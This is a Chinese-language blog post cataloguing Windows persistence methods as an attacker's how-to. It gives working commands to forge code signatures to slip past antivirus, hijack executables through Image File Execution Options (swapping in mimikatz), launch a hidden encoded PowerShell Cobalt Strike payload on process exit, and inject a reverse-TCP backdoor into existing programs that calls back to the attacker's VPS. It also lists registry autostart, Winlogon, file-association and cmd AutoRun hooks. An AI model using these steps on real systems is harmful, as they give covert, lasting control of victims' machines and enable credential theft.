Windows 权限维持几种方法

简单整理了部分方法

Posted by BY Diego on March 2, 2021

数字签名伪造

https://github.com/secretsquirrel/SigThief

给test.exe伪造数字签名,可以绕过少数杀毒程序

image-20210228090612992

image-20210228090632864

目标签名exe程序 需要与目标机器位数一致

python3 sigthief.py -i firefox.exe -t test.exe -o test1.exe

image-20210228090803526

image-20210228090701693

映像劫持

修改注册表(管理员权限)

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\  

添加想要劫持的exe的名称,再添加字符串值Debugger 值为另一个exe的路径

2C1AD4CBDDD62D08BCEE8EA3A8B23D9F

劫持后效果(运行getpass 实则执行mimikatz)

也可使用cmd 修改注册表(需要管理员权限)

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GetPass.exe" /v Debugger /t REG_SZ /d "exe路径"

验证

reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GetPass.exe"

另一种

程序结束后 自动执行

cmd 下执行

A程序为正常运行的,B为A退出后运行

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\A.exe" /v GlobalFlag /t REG_DWORD /d 512

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\A.exe" /v ReportingMode /t REG_DWORD /d 1

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\A.exe" /v MonitorProcess /t REG_SZ /d "B.exe路径"

image-20210228165027832

效果如下

cs

生成payload

image-20210228211005608

image-20210228211034924

上面把B.exe路径改为 payload即可

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\A.exe" /v MonitorProcess /t REG_SZ
/d "powershell.exe -nop -w hidden -encodedcommandJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwA........"

启动A.exe 然后退出

image-20210228211300478

隐藏后门

项目地址

https://github.com/secretsquirrel/the-backdoor-factory

将后门写入已存在的exe程序

判断目标exe是否支持写入木马

 python backdoor.py -f 目标exe -S

image-20210301160011364

查看可用payload

 python backdoor.py -f 目标exe show

image-20210301160222893

写入反向链接的🐎

python backdoor.py -f 目标.exe -s iat_reverse_tcp_stager_threaded  -P 8888 -H vps的ip地址

选择可写入的块序号

image-20210301160550627

image-20210301160647376

生的木马在 backdoored 目录下

Kali msf监听 程序执行后开始反弹 ,程序关闭之后 反弹回来的shell也会随之关闭

在线查杀 只有10个报毒

image-20210301162143748

自启动

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows

添加load字符串 ,文件路径用短文件路径(或者添加run 字符串)

image-20210301171831947

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

userinit 追加数据 用逗号分隔可以执行多程序

image-20210301172446498

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce

runonce 只执行一次 注册表信息自动消失

image-20210301184422159

\HKEY_CURRENT_USER\Environment

添加UserInitMprLogonScript字符串

image-20210301185348488

修改文件关联注册表

exe关联  HKEY_CLASSES_ROOT\exefile\shell\open\command

将默认"%1" %* 改为 恶意exe "%1" %*

修改之后打开任意exe 都会启动恶意exe

image-20210301213011691

txt关联文件

HKEY_CLASSES_ROOT\txtfile\shell\open\command

一般情况为

HKEY_CLASSES_ROOT\后缀+file\shell\open\command

跟随cmd自启动

指定cmd启动时加载的vbs脚本

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor

添加字符串 键AutoRun

image-20210302082559420